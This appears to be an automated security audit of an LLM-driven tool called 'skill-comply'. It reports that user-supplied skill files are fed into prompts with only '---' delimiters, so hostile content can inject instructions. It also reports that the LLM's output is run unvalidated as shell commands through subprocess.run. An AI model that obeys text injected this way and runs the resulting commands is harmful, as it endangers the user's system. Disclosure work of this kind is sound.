skill-comply
Fail
Audited by Gen Agent Trust Hub on Mar 23, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The script
scripts/runner.pyiterates through a list ofsetup_commandsand executes them usingsubprocess.run. These commands are parsed directly from LLM output generated during the scenario creation phase.\n- [REMOTE_CODE_EXECUTION]: Thesetup_commandsexecuted inscripts/runner.pyare dynamically generated by an LLM inscripts/scenario_generator.py. Because the tool does not validate or sanitize these commands before execution, it is vulnerable to executing arbitrary shell commands provided by the AI model. This risk is particularly high because the LLM is prompted using potentially untrusted skill files provided by the user.\n- [PROMPT_INJECTION]: The tool is vulnerable to indirect prompt injection because it incorporates external skill file content directly into prompts used for specification and scenario generation.\n - Ingestion points: Skill files provided as command-line arguments are read and interpolated into prompt templates in
scripts/spec_generator.pyandscripts/scenario_generator.py.\n - Boundary markers: The skill content is wrapped in triple-dash (
---) delimiters in the prompt templates, which may not be sufficient to prevent instructions in the skill file from escaping the intended context.\n - Capability inventory: The tool has the capability to execute shell commands via
subprocess.runinscripts/runner.pybased on LLM output.\n - Sanitization: No validation, sanitization, or filtering is performed on the input skill content or the resulting LLM-generated setup commands.
Recommendations
- AI detected serious security threats
Audit Metadata